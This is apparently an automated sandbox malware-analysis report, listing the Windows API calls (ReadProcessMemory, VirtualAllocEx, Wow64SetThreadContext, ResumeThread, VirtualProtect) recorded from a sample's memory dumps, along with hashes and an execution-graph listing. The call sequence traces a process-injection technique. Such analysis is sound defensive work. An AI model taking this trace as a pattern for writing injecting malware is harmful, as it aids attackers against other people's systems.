                                                                                      • Opcode ID: f2e8ca85dca224b2e68735160a79021e9a3b278980b1b8d492deb9845b3732b6
                                                                                      • Instruction ID: b91b7021391476e89c3d5eac8e2d2210dcd058fa9bf2446b5066cc154bf73f46
                                                                                      • Opcode Fuzzy Hash: f2e8ca85dca224b2e68735160a79021e9a3b278980b1b8d492deb9845b3732b6
                                                                                      • Instruction Fuzzy Hash: 7E4166B9D002589FCB10CFA9D984ADEBBF5BB09310F14906AE958BB311D335A985CF54
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3E0A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: 41685142f57911fc445cba7282732a0575f7feff4e04d3295555abfcebe5a8db
                                                                                      • Instruction ID: 0a3d02e0dbf56fa178195843f39d82698135238de561d59fd674f6637749d341
                                                                                      • Opcode Fuzzy Hash: 41685142f57911fc445cba7282732a0575f7feff4e04d3295555abfcebe5a8db
                                                                                      • Instruction Fuzzy Hash: 8041B9B9D042589FCF10CFA9D884AEEFBB1BF49310F10942AE819B7240D735A946CF64
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023F894B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 06310f92331df0a2870c033ae5c9e75afc46f66804d7c19688d401876b760ef1
                                                                                      • Instruction ID: f48964772806d4750dec4dc2a8b121f22b5f9977052d903b315cdd55437e863b
                                                                                      • Opcode Fuzzy Hash: 06310f92331df0a2870c033ae5c9e75afc46f66804d7c19688d401876b760ef1
                                                                                      • Instruction Fuzzy Hash: A04164B9D002589FCB10CFA9D984ADEBBF5BB09310F14906AE918BB310D335A945CF54
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F3DE22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 6e9201f86f8cbc60966457e9fac21eb397c22ab0978c336fa92df6c1a3900d62
                                                                                      • Instruction ID: 97f9f03757fed0eda1d226a60c4f1e8b88a015198044b9cfae7a04d082a96f61
                                                                                      • Opcode Fuzzy Hash: 6e9201f86f8cbc60966457e9fac21eb397c22ab0978c336fa92df6c1a3900d62
                                                                                      • Instruction Fuzzy Hash: 6241C8B9D042589FCF10DFA9D884ADEFBB1FB59310F10942AE815B7210D735A946CF64
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3E0A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: b77cbafdf321356957efec86b3db18f8b010d6f867f18f57c6d4afca16819adc
                                                                                      • Instruction ID: bd89798e1b3206337937918fab4a8e4f2e90213cb699fba202ba251d57184f38
                                                                                      • Opcode Fuzzy Hash: b77cbafdf321356957efec86b3db18f8b010d6f867f18f57c6d4afca16819adc
                                                                                      • Instruction Fuzzy Hash: 9D4188B5D042589FCF10DFAAD984AEEFBB1BF49310F10942AE815B7240D735A945CF64
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F3DE22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: deda042df5576c68e2d712b14e072b26dbbf3326b8a02101455447f6c390b201
                                                                                      • Instruction ID: 21fbcf3f35ce33916165fff900a90974493ebf378120c1a7c8f820c5f290194b
                                                                                      • Opcode Fuzzy Hash: deda042df5576c68e2d712b14e072b26dbbf3326b8a02101455447f6c390b201
                                                                                      • Instruction Fuzzy Hash: D731A8B9D002589FCF10DFA9D984ADEFBB1BB59310F10A42AE815B7210D735A946CF64
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 08F3DCFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: 642ccbb2158eea5d703c008b2ffb5fe138581ea19b82945c47b0078b71f63ac7
                                                                                      • Instruction ID: 38b4d0945418d96144d7f71e2ef246f3352f6a34448a47cd322d842e4e2fb1b5
                                                                                      • Opcode Fuzzy Hash: 642ccbb2158eea5d703c008b2ffb5fe138581ea19b82945c47b0078b71f63ac7
                                                                                      • Instruction Fuzzy Hash: D041CCB5D012589FCB10DFA9D884AEEBBF1BF49314F24902AE418B7240D779AA46CF54
                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 023FF761
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 5965f58fd82df95025dd1cedf61797c3de143ac707f37b74202ae3041612e10a
                                                                                      • Instruction ID: e0696aebb6d7192b49677c075d94d9310f3c7d8b6fdbd08ad221a471f84cd191
                                                                                      • Opcode Fuzzy Hash: 5965f58fd82df95025dd1cedf61797c3de143ac707f37b74202ae3041612e10a
                                                                                      • Instruction Fuzzy Hash: C44147B8A00309CFCB54CF99D488AAAFBF5FB88314F24C459D519A7761D730A845CFA0
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A7850F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: a05b508baf665207d3e88e2da340b70df06884e5351b286d5afbc75809474338
                                                                                      • Instruction ID: d9d65bc9136eeaa17786b2200a8d2342d4e9b55b8c002936f2f6ec446bc2cf7c
                                                                                      • Opcode Fuzzy Hash: a05b508baf665207d3e88e2da340b70df06884e5351b286d5afbc75809474338
                                                                                      • Instruction Fuzzy Hash: 993189B9D042589FCB10CFA9D984ADEFBF1BB19310F24902AE818B7350D775A945CF64
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 08F3DCFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: ac2d259c32c3aee353571d1d9512afe007c0982db16898c8a35e3c409e0e0840
                                                                                      • Instruction ID: 234ede0bb664eecc757989c5639cce98b805cd9c801f04a83fb1cfcacadfd473
                                                                                      • Opcode Fuzzy Hash: ac2d259c32c3aee353571d1d9512afe007c0982db16898c8a35e3c409e0e0840
                                                                                      • Instruction Fuzzy Hash: 7231BBB4D002589FCB10DFAAD884AEEFBF1BF49310F24802AE418B7240D738A945CF64
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04A91253
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1753952536.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4a90000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      • Opcode ID: 49d585069d4aa5ad8bdd9ef105016a59a6650e71ed353798a82aea1e410ca09e
                                                                                      • Instruction ID: 0b66db44ee7ed6b57af453ff5e39c92644f4cb6d0ea7ceb12f41a20749641547
                                                                                      • Opcode Fuzzy Hash: 49d585069d4aa5ad8bdd9ef105016a59a6650e71ed353798a82aea1e410ca09e
                                                                                      • Instruction Fuzzy Hash: 7031A8B8D01248AFCF14CFA9D584A9EFBF1BB49310F14906AE818BB310D335A945CF54
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04A91253
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1753952536.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4a90000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      • Opcode ID: 863df7606e29a66998f2bdc14ee209dfccd7db9bfe868f41bad047e16720778b
                                                                                      • Instruction ID: aa3845991e8d20678676e6f9e99485cfc7884a50604e81ec279bc774c65d296f
                                                                                      • Opcode Fuzzy Hash: 863df7606e29a66998f2bdc14ee209dfccd7db9bfe868f41bad047e16720778b
                                                                                      • Instruction Fuzzy Hash: B43167B9D002589FCF14DFA9D584A9EFBF5BB49310F14902AE818BB310D735A945CF64
                                                                                      APIs
                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 00A7A852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugOutputString
                                                                                      • String ID:
                                                                                      • API String ID: 1166629820-0
                                                                                      • Opcode ID: 14e844bdd55525500e2e4d8ea6ab4e7499adb6c08b9619eb5ab9bc7698875a57
                                                                                      • Instruction ID: 0c7ecb72099a1c653d0fe0374d91d9aba1cf67ee84a4a520fbc4378c16408f60
                                                                                      • Opcode Fuzzy Hash: 14e844bdd55525500e2e4d8ea6ab4e7499adb6c08b9619eb5ab9bc7698875a57
                                                                                      • Instruction Fuzzy Hash: D431BCB4D002489FCB14CFA9D984ADEFBF1AB59310F14906AE818B7360D734A945CFA5
                                                                                      APIs
                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 00A7A852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugOutputString
                                                                                      • String ID:
                                                                                      • API String ID: 1166629820-0
                                                                                      • Opcode ID: 9b6247de385ecded09dabd93c64389b21bb469e429a7a55353778d31d9fd25c2
                                                                                      • Instruction ID: 74d4717feda95a2700cdc18c721a0d984b126a42e0d99cb607ac58f26a3fa41a
                                                                                      • Opcode Fuzzy Hash: 9b6247de385ecded09dabd93c64389b21bb469e429a7a55353778d31d9fd25c2
                                                                                      • Instruction Fuzzy Hash: 7B31DDB4D002489FCB14CFAAD984ADEFBF1AF49310F14906AE818B7360D734A946CF65
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(?), ref: 023F64D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 8c7f5ad66d5f90e29a061bf3bf2e5905da589688f07608150372e16ebd345ccb
                                                                                      • Instruction ID: 5531f8f7730487a149f4ba7de29f6e6f2348f24f2491874a530ece40dc274a75
                                                                                      • Opcode Fuzzy Hash: 8c7f5ad66d5f90e29a061bf3bf2e5905da589688f07608150372e16ebd345ccb
                                                                                      • Instruction Fuzzy Hash: 6C31D9B4D002089FCB14CFAAE984ADEFBF5AB49310F14906AE918B7320D334A945CF64
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 08F3D7A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: af19b50b776a86bad53262220b672788f4876a0c1c6ddc33ca3c86f34e3bcd21
                                                                                      • Instruction ID: 9e78f5f0da92aae3797653e570c5fd025f4873b5574e774e831270fb41f2e5fb
                                                                                      • Opcode Fuzzy Hash: af19b50b776a86bad53262220b672788f4876a0c1c6ddc33ca3c86f34e3bcd21
                                                                                      • Instruction Fuzzy Hash: 2B31CCB4D012189FCB14DFA9D884ADEFBF5AF49310F14942AE819B7340D735A901CF54
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 08F3D7A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: a1deab256f68ef631ac3ffd6b8ca359f3cfa060e8e3864eeeaa28bfced6c5f35
                                                                                      • Instruction ID: 4aa5317ceca031dda2d72914b4551d32a61fe150a7790602b73edf5469fe1d11
                                                                                      • Opcode Fuzzy Hash: a1deab256f68ef631ac3ffd6b8ca359f3cfa060e8e3864eeeaa28bfced6c5f35
                                                                                      • Instruction Fuzzy Hash: 8E31AAB4D012189FCB14DFAAD985A9EFBF5AB49310F14942AE819B7340C735A941CF64
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00A7A92E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: aba1bc3e103e246007e9942a2d18e0ebe8f0c92635e7b0d7ef614a4b05443522
                                                                                      • Instruction ID: 531a59c865ce9f5b629c436e31c9fe6c7498caa805d9b432c28aa450608b4ddf
                                                                                      • Opcode Fuzzy Hash: aba1bc3e103e246007e9942a2d18e0ebe8f0c92635e7b0d7ef614a4b05443522
                                                                                      • Instruction Fuzzy Hash: 7D31BDB4D002589FCB10CFA9D884AEEFBF0AB49320F14905AE859B3351C379A946CF64
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00A7A92E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 34a14aa36dbe03a19b753ebc1edbdc0fd9a1adb0ed789f218f8a6eb451a741f2
                                                                                      • Instruction ID: 0fd3ac226297814fd60fe7e82c8f2700d9a2b50df8f6ebe08e0580662fa77dd6
                                                                                      • Opcode Fuzzy Hash: 34a14aa36dbe03a19b753ebc1edbdc0fd9a1adb0ed789f218f8a6eb451a741f2
                                                                                      • Instruction Fuzzy Hash: 3B31BDB4D042189FCB10CFA9D884AEEFBF4AB49310F14906AE918B3350D375A945CFA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1746850983.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_6ed000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e155bf96b193a522b1a49ccc1fa57fe51be97b7be1f1c214986b04a6c50d4b0
                                                                                      • Instruction ID: fe78f50a8847777a544103a0d448b456cc334bae66edd01edc5c4192ca7826d7
                                                                                      • Opcode Fuzzy Hash: 4e155bf96b193a522b1a49ccc1fa57fe51be97b7be1f1c214986b04a6c50d4b0
                                                                                      • Instruction Fuzzy Hash: B92128B1505380DFCB05DF14D9C4B26BFA6FB98328F24C569D90A0B356C336D856C7A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8eaf4374d0095b8bfe5620e1c228d70cf1ee0dab1a487eea304fb15d3f0c1bf4
                                                                                      • Instruction ID: 6704e126717ab44ac4af6d15ec9c4fa87feeacb0e3873db176605ee6948dee48
                                                                                      • Opcode Fuzzy Hash: 8eaf4374d0095b8bfe5620e1c228d70cf1ee0dab1a487eea304fb15d3f0c1bf4
                                                                                      • Instruction Fuzzy Hash: AC21F571604304EFDB45DF94D9C4B25BBA5FB94314F24C66DE80A8B392C336E816CA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 805bcea7896fde9c2f5a675c962158bb3f97337aacf0b3388843ebe200f7d012
                                                                                      • Instruction ID: 4530392fa390b0b12cae251cad62b89f6fdc449411f0e35c7bc58c8a5965ad78
                                                                                      • Opcode Fuzzy Hash: 805bcea7896fde9c2f5a675c962158bb3f97337aacf0b3388843ebe200f7d012
                                                                                      • Instruction Fuzzy Hash: 872100B1604704EFDB54DF54D884B26BBA5FB84324F20C969D80E8B382C33AD807CA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1746850983.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_6ed000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                      • Instruction ID: c4403dbc203c69ef8ba4d9321f76a1acb67d0e6ead0807e7fae21d9fa3a4e9e1
                                                                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                      • Instruction Fuzzy Hash: A711AF76504380DFCB16CF14D9C4B56BF72FB94324F24C6A9D9090B256C33AD85ACBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction ID: e381281374c8cd2bbc3f067ab83887ad8559ba22262f799c305cd43676926617
                                                                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction Fuzzy Hash: 7711BE75504780CFCB11CF54D9C4B15BB62FB44324F24C6A9D8098B696C33AD80ACB62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction ID: d36b978bc39c44d8d6a77c1ed41912234527ceb7fb0b98a20fccba48db2d204a
                                                                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction Fuzzy Hash: A811BB75904380DFDB02CF54C9C4B15BBB2FB84324F24C6ADD8498B696C33AE80ACB61

                                                                                      Execution Graph

                                                                                      Execution Coverage:3%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:1.3%
                                                                                      Total number of Nodes:300
                                                                                      Total number of Limit Nodes:13
                                                                                      execution_graph 8941 408952 8962 40823f 8941->8962 8944 408960 8946 4056bf 2 API calls 8944->8946 8947 40896a 8946->8947 8990 408862 8947->8990 8949 4089c4 8950 413aca 4 API calls 8949->8950 8951 4089d4 8950->8951 8953 405695 2 API calls 8951->8953 8952 408975 8952->8949 8998 4087d6 8952->8998 8955 4089df 8953->8955 8960 402bab 2 API calls 8961 40899d 8960->8961 8961->8949 8961->8960 8963 40824d 8962->8963 8964 40831b 8963->8964 8965 4031e5 3 API calls 8963->8965 8964->8944 8978 4083bb 8964->8978 8966 40826d 8965->8966 8967 4031e5 3 API calls 8966->8967 8968 408289 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 4082a5 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082c1 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082e2 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082ff 8975->8976 8977 4031e5 3 API calls 8976->8977 8977->8964 9026 408363 8978->9026 8981 4084ab 8981->8944 8982 4056bf 2 API calls 8987 4083f4 8982->8987 8983 408492 8984 413aca 4 API calls 8983->8984 8985 4084a0 8984->8985 8986 405695 2 API calls 8985->8986 8986->8981 8987->8983 9029 40815d 8987->9029 9044 40805d 8987->9044 9059 404b8f 8990->9059 8992 40887e 8993 4031e5 3 API calls 8992->8993 8994 40893e 8992->8994 8996 408946 8992->8996 8997 402b7c 2 API calls 8992->8997 8993->8992 9062 404a39 8994->9062 8996->8952 8997->8992 8999 402b7c 2 API calls 8998->8999 9000 4087e7 8999->9000 9001 4031e5 3 API calls 9000->9001 9005 40885a 9000->9005 9002 408802 9001->9002 9006 40884d 9002->9006 9009 408853 9002->9009 9071 408522 9002->9071 9075 4084b4 9002->9075 9003 402bab 2 API calls 9003->9005 9010 408749 9005->9010 9078 4084d4 9006->9078 9009->9003 9011 404b8f 3 API calls 9010->9011 9012 408765 9011->9012 9013 4031e5 3 API calls 9012->9013 9014 408522 3 API calls 9012->9014 9015 4087c7 9012->9015 9017 4087cf 9012->9017 9013->9012 9014->9012 9016 404a39 4 API calls 9015->9016 9016->9017 9018 4085d1 9017->9018 9019 4086c2 9018->9019 9022 4085e9 9018->9022 9019->8961 9021 402bab 2 API calls 9021->9022 9022->9019 9022->9021 9023 4031e5 3 API calls 9022->9023 9084 4089e6 9022->9084 9103 4086c9 9022->9103 9107 4036a3 9022->9107 9023->9022 9027 4031e5 3 API calls 9026->9027 9028 408386 9027->9028 9028->8981 9028->8982 9030 40816f 9029->9030 9031 4081b6 9030->9031 9032 4081fd 9030->9032 9043 4081ef 9030->9043 9034 405872 4 API calls 9031->9034 9033 405872 4 API calls 9032->9033 9035 408213 9033->9035 9036 4081cf 9034->9036 9037 405872 4 API calls 9035->9037 9038 405872 4 API calls 9036->9038 9039 408222 9037->9039 9040 4081df 9038->9040 9041 405872 4 API calls 9039->9041 9042 405872 4 API calls 9040->9042 9041->9043 9042->9043 9043->8987 9045 40808c 9044->9045 9046 4080d2 9045->9046 9047 408119 9045->9047 9058 40810b 9045->9058 9048 405872 4 API calls 9046->9048 9049 405872 4 API calls 9047->9049 9050 4080eb 9048->9050 9051 40812f 9049->9051 9052 405872 4 API calls 9050->9052 9053 405872 4 API calls 9051->9053 9054 4080fb 9052->9054 9055 40813e 9053->9055 9056 405872 4 API calls 9054->9056 9057 405872 4 API calls 9055->9057 9056->9058 9057->9058 9058->8987 9065 404a19 9059->9065 9068 4049ff 9062->9068 9064 404a44 9064->8996 9066 4031e5 3 API calls 9065->9066 9067 404a2c 9066->9067 9067->8992 9069 4031e5 3 API calls 9068->9069 9070 404a12 RegCloseKey 9069->9070 9070->9064 9072 408534 9071->9072 9074 4085af 9072->9074 9081 4084ee 9072->9081 9074->9002 9076 4031e5 3 API calls 9075->9076 9077 4084c7 9076->9077 9077->9002 9079 4031e5 3 API calls 9078->9079 9080 4084e7 9079->9080 9080->9009 9082 4031e5 3 API calls 9081->9082 9083 408501 9082->9083 9083->9074 9085 4031e5 3 API calls 9084->9085 9086 408a06 9085->9086 9087 4031e5 3 API calls 9086->9087 9091 408b21 9086->9091 9090 408a32 9087->9090 9088 408b17 9119 403649 9088->9119 9090->9088 9110 403666 9090->9110 9091->9022 9094 408b0e 9116 40362f 9094->9116 9096 4031e5 3 API calls 9097 408a88 9096->9097 9097->9094 9098 4031e5 3 API calls 9097->9098 9099 408ac4 9098->9099 9100 405b6f 5 API calls 9099->9100 9101 408aff 9100->9101 9101->9094 9113 408508 9101->9113 9104 4086e2 9103->9104 9106 408744 9103->9106 9105 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9104->9105 9104->9106 9105->9104 9106->9022 9108 4031e5 3 API calls 9107->9108 9109 4036b5 9108->9109 9109->9022 9111 4031e5 3 API calls 9110->9111 9112 403679 9111->9112 9112->9094 9112->9096 9114 4031e5 3 API calls 9113->9114 9115 40851b 9114->9115 9115->9094 9117 4031e5 3 API calls 9116->9117 9118 403642 9117->9118 9118->9088 9120 4031e5 3 API calls 9119->9120 9121 40365c 9120->9121 9121->9091 8099 402c1f 8100 4031e5 3 API calls 8099->8100 8101 402c31 LoadLibraryW 8100->8101 8058 405924 8061 4031e5 8058->8061 8062 4031f3 8061->8062 8063 403236 8061->8063 8062->8063 8065 403208 8062->8065 8072 4030a5 8063->8072 8078 403263 8065->8078 8067 4031e5 3 API calls 8069 403258 8067->8069 8068 40320d 